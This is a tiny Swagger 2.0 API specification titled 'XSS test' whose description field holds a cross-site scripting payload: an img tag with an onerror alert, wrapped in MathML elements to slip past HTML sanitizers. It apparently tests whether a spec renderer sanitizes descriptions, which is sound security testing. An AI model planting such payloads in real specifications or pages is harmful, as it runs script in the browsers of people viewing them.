swagger: "2.0"
info:
  title: "XSS test"
  version: "1.0.0"
  description: |
    <math><mtext><img src=x onerror=alert(document.domain)></mtext></math>
paths:
  /x:
    get:
      responses:
        "200": { description: "OK" }
